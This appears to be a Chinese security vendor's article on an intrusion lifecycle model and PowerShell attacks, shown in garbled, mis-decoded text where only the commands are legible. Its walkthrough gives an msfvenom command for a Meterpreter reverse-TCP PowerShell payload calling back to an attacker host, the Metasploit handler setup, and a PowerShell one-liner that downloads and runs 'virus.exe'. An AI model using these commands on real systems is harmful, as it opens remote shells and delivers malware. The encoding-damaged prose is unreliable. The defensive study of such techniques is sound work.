Ìá½»ÐèÇó
      *
      *

      *
      *
      *
      Á¢¼´Ìá½»
      µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

      logo

        ²úÆ·Óë·þÎñ
        ½â¾ö·½°¸
        ¼¼ÊõÖ§³Ö
        ºÏ×÷·¢Õ¹
        ¹ØÓڻƽð³Ç

        ÉêÇëÊÔÓÃ
          ¡¶ÈëÇÖÉúÃüÖÜÆÚϸ·Öʵ¼ùÖ¸ÄÏ¡·£ºWindows PowerShell¹¥»÷
          ·¢²¼Ê±¼ä£º2021-07-28 ÔĶÁ´ÎÊý£º 412 ´Î

          »Æ½ð³Ç¿Æ¼¼ÎªÁ˸üºÃµØ½øÐÐÈëÇÖ¼ì²âºÍ·ÀÓù£¬²ÎÕÕ¸÷Öֻƽð³Ç¹ÙÍøÍþв¿ò¼ÜºÍ×ÔÉíµÄʵ¼ùÓë˼¿¼£¬Ìá³öÁË»ùÓÚÈëÇÖÉúÃüÖÜÆÚµÄ¹¥»÷¹ÜÀíÄ£ÐÍ¡£


          ×÷Ϊ»Æ½ð³ÇÐÂÒ»´ú»Æ½ð³Ç¹ÙÍø¼Ü¹¹µÄÈý´óÖ§ÖùÖ®Ò»¡£ÈëÇÖÉúÃüÖÜÆÚv1.0°ÑÈëÇÖ¹ý³Ì»®·ÖΪ7¸ö½×¶Î£ºÌ½Ë÷·¢ÏÖ¡¢ÈëÇֺ͸ÐȾ¡¢Ì½Ë÷¸ÐÖª¡¢´«²¥¡¢³Ö¾Ã»¯¡¢¹¥»÷ºÍÀûÓᢻָ´¡£ÈëÇÖÉúÃüÖÜÆÚv1.0ͬÑùÒÔATT&CK×÷Ϊ»ù±¾Õ½Êõ֪ʶ¿â£¬Æ¥Åäµ½²»Í¬µÄÈëÇֽ׶Ρ£ÐèҪעÒâµÄÊÇ£¬²¢·ÇËùÓеÄÈëÇÖ¶¼»á¾­ÀúÕâ7¸ö½×¶Î£¬Ò²Ã»Óоø¶ÔµÄÏßÐÔ´ÎÐò¡£


          1£©Ì½Ë÷·¢ÏÖ


          ÔÚÕâ¸ö½×¶ÎÖУ¬¹¥»÷Õß»áÏÈËø¶¨¹¥»÷¶ÔÏó£¬È»ºóÀûÓÃijЩ¼¼ÊõÊֶΣ¬¾¡¿ÉÄÜ¶àµØ»ñȡĿ±ê±©Â¶³öÀ´µÄÐÅÏ¢£¬Èçͨ¹ý¶Ë¿ÚɨÃè¡¢Ö¸ÎÆÌ½²âµÈ·½Ê½£¬·¢ÏÖÃô¸Ð¶Ë¿Ú¼°°æ±¾ÐÅÏ¢£¬½ø¶øÑ°ÕÒ¹¥»÷µã£¬ÎªÏÂÒ»²½ÈëÇÖ×ö×¼±¸¡£


          2£©ÈëÇֺ͸ÐȾ


          ÔÚÕâ¸ö½×¶Î£¬¹¥»÷Õß»á¸ù¾Ý¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎËù·¢ÏÖµÄÖØÒªÐÅÏ¢£¬À´¶ÔÄ¿±ê±©Â¶³öµÄ¹¥»÷Ãæ½øÐй¥»÷³¢ÊÔ£¬ÔÚ¡°Ì½Ë÷·¢ÏÖ¡±½×¶ÎÊÕ¼¯µ½µÄÐÅÏ¢Ô½¶à£¬¹¥»÷¶ÔÏóËù±©Â¶µÄ¹¥»÷ÃæÒ²¾ÍÔ½¶à£¬¹¥»÷¸üÒ׳ɹ¦¡£


          3£©Ì½Ë÷¸ÐÖª


          ¹¥»÷ÕßÔڳɹ¦½øÈëϵͳÄÚ²¿ºó£¬ÓÉÓÚÊÇÊ״νøÈëËùÒÔ»á³öÏÖ¶ÔÄÚ²¿»·¾³²»ÊìϤµÄÇé¿ö£¬Õâʱ¹¥»÷Õߵ͝×÷Ò»°ã»áÊǶԵ±Ç°Ëù´¦»·¾³½øÐÐ̽Ë÷£¬ÃþÇåÄÚ²¿´óÖµÄÍøÂç½á¹¹£¬³£³£°éËæ×ű»ÈëÇÖ±¾»úµÄÃô¸ÐÐÅÏ¢ÊÕ¼¯ÒÔ¼°¶ÔÄÚÍø´óÁ¿µÄ¶Ë¿Ú½øÐÐɨÃ裬ºóÐø¸ù¾Ý¹¥»÷ÕßµÄÄ¿µÄ½øÐÐÏÂÒ»²½²Ù×÷¡£


          4£©´«²¥


          Ôڴ˽׶Σ¬¹¥»÷Õ߸ù¾ÝÉÏÒ»½×¶ÎÔÚÄÚÍøÌ½Ë÷¸ÐÖªÊÕ¼¯µ½µÄÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨µÄ¹¥»÷ÊÖ·¨¡£ÈçÈô·¢ÏÖÄÚ²¿ÊÇÓò»·¾³£¬¹¥»÷Õß¿ÉÄ᳢ܻÊÔÏȹ¥ÆÆÓò¿Ø·þÎñÆ÷£¬ÔÙ´«²¥ÆäËû»úÆ÷¡£ÈôÊǹ¤×÷×é»·¾³£¬¿ÉÄÜ»áÀûÓÃÊÕ¼¯µ½µÄ¶Ë¿ÚºÍ·þÎñÐÅÏ¢£¬Ñ¡ÔñÌØ¶¨Â©¶´½øÐÐÅúÁ¿É¨Ãè¹¥»÷£¬À´¾¡¿ÉÄÜ¶àµØ¼ÌÐø»ñµÃÆäËû¼ÆËã»úµÄ¿ØÖÆÈ¨¡£


          5£©³Ö¾Ã»¯


          ¹¥»÷ÕßÔÚ¶Ô×ʲú½øÐжñÒâ²Ù×÷ºó£¬ÎªÁËÄܹ»¼õÉÙÔÙ´ÎÁ¬½ÓµÄ¹¥»÷³É±¾£¬·½±ãÏ´νøÈ룬»á½øÐС°ÁôºóÃÅ¡±µÄ²Ù×÷£¬³£¼ûµÄºóÃÅÈ磺½¨Á¢¼Æ»®ÈÎÎñ£¬¶¨Ê±Á¬½ÓÔ¶³Ì·þÎñÆ÷£»ÉèÖÿª»úÆô¶¯³ÌÐò£¬ÔÚÿ´Î¿ª»úʱ´¥·¢Ö´ÐÐÌØ¶¨¶ñÒâ³ÌÐò£»Ð½¨ÏµÍ³¹ÜÀíÔ±Õ˺ŵȡ£ÕâÑù±ãÓÚ¹¥»÷ÕßÏ´οìËٵǼ²¢¿ØÖƸÃϵͳ¡£


          6£©¹¥»÷ºÍÀûÓÃ


          ¹¥»÷ÕßÔڴ˽׶αã»á¿ªÊ¼¶ÔÄ¿±ê×ʲú½øÐжñÒâ²Ù×÷£¬°´ÕÕ¹¥»÷ÕßÒâÔ¸£¬¶ÔÄÜÀûÓõÄÊý¾Ý½øÐÐÇÔÈ¡¡¢ÀûÓã»¶Ô²Ù×÷ϵͳ¡¢Ãô¸ÐÎļþ½øÐÐÆÆ»µ¡¢É¾³ý¡£ËùÓеķÀÓùÊֶζ¼Ó¦¸Ã¼«Á¦×èÖ¹¹¥»÷Õß½øÐе½ÕâÒ»½×¶Î¡£


          7£©»Ö¸´


          ¹¥»÷ÕßÔÚÖ´ÐÐËùÓеĹ¥»÷²Ù×÷ʱ£¬ÍùÍù»áÔÚϵͳÉÏÁôÏ´óÁ¿µÄÐÐΪÈÕÖ¾£¬Òò´ËÔÚÕâÒ»½×¶Î£¬¹¥»÷Õß»á¶Ô¼Ç¼×ÔÉíºÛ¼£µÄËùÓÐÈÕÖ¾½øÐд¦Àí£¬»òɾ³ý»ò»ìÏý£¬´Ó¶øÏûÃðÖ¤¾Ý£¬ÌÓ±Ü×·×Ù¡£


          ¡°

          ±¾ÏµÁÐÎÄÕ»ùÓڻƽð³Ç¿Æ¼¼ÈëÇÖÉúÃüÖÜÆÚ1.0¼Ü¹¹£¬Ï¸·Ö¸ö½×¶Î¹¥»÷Õߵij£Óù¥»÷ÊֶΣ¬²¢¶ÔÏà¹Ø¹¥»÷ÊֶεľßÌåʵʩ·½Ê½½øÐÐÖðÒ»ÆÊÎö£¬Îª»Æ½ð³Ç¹ÙÍø·ÀÓù½¨ÉèÌṩÓÐÁ¦ÖªÊ¶²¹³äºÍ·´ÖÆ×¼±¸¡£


          Windows PowerShell¹¥»÷

          ̽Ë÷·¢ÏÖ¡¢ÈëÇֺ͸ÐȾ¡¢Ì½Ë÷¸ÐÖª

          ´«²¥¡¢¹¥»÷ºÍÀûÓᢳ־û¯½×¶Î


          Windows PowerShellÊÇÒ»ÖÖÃüÁîÐÐÍâ¿Ç³ÌÐòºÍ½Å±¾»·¾³£¬ËüÄÚÖÃÔÚÿ¸öÊÜÖ§³ÖµÄWindows°æ±¾ÖУ¨Windows 7/Windows 2008 R2ºÍ¸ü¸ß°æ±¾£©£¬Ê¹ÃüÁîÐÐÓû§ºÍ½Å±¾±àдÕß¿ÉÒÔÀûÓÃ.NET FrameworkµÄÇ¿´ó¹¦ÄÜ¡£


          ÔÚÉøÍ¸²âÊÔÖУ¬PowerShellÊDz»ÄܺöÂÔµÄÒ»¸ö»·½Ú£¬¶øÇÒÈÔÔÚ²»¶ÏµØ¸üкͷ¢Õ¹£¬Ëü¾ßÓÐÁîÈËÄÑÒÔÖÃÐŵÄÁé»îÐԺ͹¦ÄÜ»¯¹ÜÀíWindowsϵͳµÄÄÜÁ¦¡£Ò»µ©¹¥»÷Õß¿ÉÒÔÔÚһ̨¼ÆËã»úÉÏÔËÐдúÂ룬¾Í»áÏÂÔØPowerShell½Å±¾Îļþ£¨.ps1£©µ½´ÅÅÌÖÐÖ´ÐУ¬ÉõÖÁÎÞÐëдµ½´ÅÅÌÖÐÖ´ÐУ¬Ëü¿ÉÒÔÖ±½ÓÔÚÄÚ´æÖÐÔËÐС£ÕâÐ©ÌØµãʹµÃPowerShellÔÚ»ñµÃºÍ±£³Ö¶ÔϵͳµÄ·ÃÎÊȨÏÞʱ£¬³ÉΪ¹¥»÷ÕßÊ×Ñ¡µÄ¹¥»÷ÊֶΡ£


          ÀûÓÃPowerShellµÄÖî¶àÌØµã£¬¹¥»÷Õß¿ÉÒÔ³ÖÐø¹¥»÷¶ø²»±»ÇáÒ×·¢ÏÖ¡£Òò´Ë£¬powershellÔÚÈëÇÖ¹ý³ÌµÄ¶à¸öÉúÃüÖÜÆÚÁ÷³Ì¶¼·¢»Ó×ÅÖØÒª×÷Óã¬ÒÔ°ïÖú¹¥»÷ÕßÍê³É¸÷Àà²Ù×÷¡£´ÓÈëÇÖÉúÃüÖÜÆÚ½Ç¶È·ÖÎö£¬powershell¿É×÷ÓÃÓÚ¹¥»÷Õß̽Ë÷·¢ÏÖ¡¢ÈëÇֺ͸ÐȾ¡¢Ì½Ë÷¸ÐÖª¡¢´«²¥¡¢¹¥»÷ºÍÀûÓᢳ־û¯½×¶ÎÁù¸ö½×¶Î¡£


          ´Ó¹¥»÷ÐÐΪÁ´ÌõµÄÉÏÏÂÎÄÀ´¿´£¬Õë¶ÔpowershellµÄÐÐΪÁ´ÌõÊäÈëÊä³öÈçÏ¡£


          ÊäÈ룺µ÷ÓÃpowershellµ÷Ó÷½Ê½£¨±¾µØµ÷Óá¢Ô¶³Ìµ÷Óã©¡¢powershellµ÷ÓÃʱ¼ä¡¢powershellµ÷ÓÃÕß¡¢Ö´ÐеÄpowershellÃüÁî¡¢Ö´ÐеÄpowershell½Å±¾µÈ¡£


          Êä³ö£ºÖ´ÐÐPowerShellÃüÁîºóµÄÊä³ö½á¹û¡¢Ö´ÐÐPowerShell½Å±¾ºóµÄÊä³ö½á¹û¡¢powershellÃüÁî»ò½Å±¾µ÷Óõĺ¯ÊýµÈ¡£


          Õë¶Ôpowershell£¬Ä¿Ç°Ö÷ÒªÓÐÒÔϼ¸ÖÖ³£ÓÃÊֶΣº


          1£®Ê¹ÓÃPowerShell½øÐж˿ÚɨÃè


          2£®Ö´ÐÐPowerShell¶ñÒâÓÐЧ¸ºÔØ£¬ÀýÈçʹÓÃPowerShell½Å±¾£¬·´µ¯shellµ½metasploit


          ²Ù×÷»·¾³£º±¾»úkali ,ip:192.168.215.151  ±»¹¥»÷Õßwin7,ip:192.168.215.148


          ÍøÂç»·¾³£º¾ÖÓòÍø


          ˼·£ºÓÃkaliµÄmsfvenomÉú³ÉÒ»¸öºóÃÅ£¬Æô¶¯msf¼àÌýÏàÓ¦¶Ë¿Ú£¬ÈÃÄ¿±êÖ÷»úÖ´Ðм´¿É·´µ¯Ò»¸öshell


          (1)Ê×ÏÈÖ´ÐÐmsfvenom -p windows/x64/meterpreter/reverse_tcplhost=192.168.215.151 lport=6666 -f psh-reflection>test.ps1£¬Éú³ÉÒ»¸öpowershell½Å±¾£¬lhostÊÇÖ´ÐкóÃźóËùÒª·´µ¯µÄip,lportÊǶ˿Ú¡£


          (2)Æô¶¯msfconsole


          (3)Æô¶¯msfºó²½ÖèÈçÏ£º


          a.   ʹÓÃuseexploit/multi/handlerÄ£¿é


          b.   ÉèÖÃpayload£¬set payload windows/x64/meterpreter/reverse_tcp£¬ÕâÊÇÒ»¸ö·´µ¯shellµÄpayload


          c.   ÉèÖÃlhostΪ±¾»úµÄip192.168.215.151


          d.   ÉèÖÃlportΪ6666£¬ÓëµÚÒ»²½ÉèÖõÄpowershell½Å±¾ÖеĶ˿ÚÒ»Ö¡£


          e.   ÉèÖÃÍê³Éºó£¬Ö´ÐÐrun


          (4)ÔÚwindows»úÆ÷ÖÐÖ´ÐÐpowershell½Å±¾£¬´ËʱkaliÖлáÏÔʾÈçϽá¹û£º


          (5)ÔÚmeterpreterÖÐÊäÈëshell£¬¼´¿ÉÄõ½ÏàÓ¦µÄshell£¬Ö´ÐÐÒ»ÏÂÃüÁîipconfig£¬³É¹¦»ØÏÔ¡£


          3£®Ê¹ÓÃPowerShell´ÓInternetÏÂÔØ²¢ÔËÐпÉÖ´ÐÐÎļþ£¬ÀýÈçÖ´ÐÐÒÔÏÂÃüÁԶ³ÌÏÂÔØ²¡¶¾Îļþ²¢Ö´ÐУº


          powershell (new-objectSystem.Net.WebClient).DownloadFile('http://ip/virus.exe','c:downloadvirus.exe');start-process'c:downloadvirus.exe'

          Ãâ·ÑÊÔÓÃ
          ·þÎñÈÈÏß

          ÂíÉÏ×Éѯ

          400-811-3777

          »Øµ½¶¥²¿
          ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿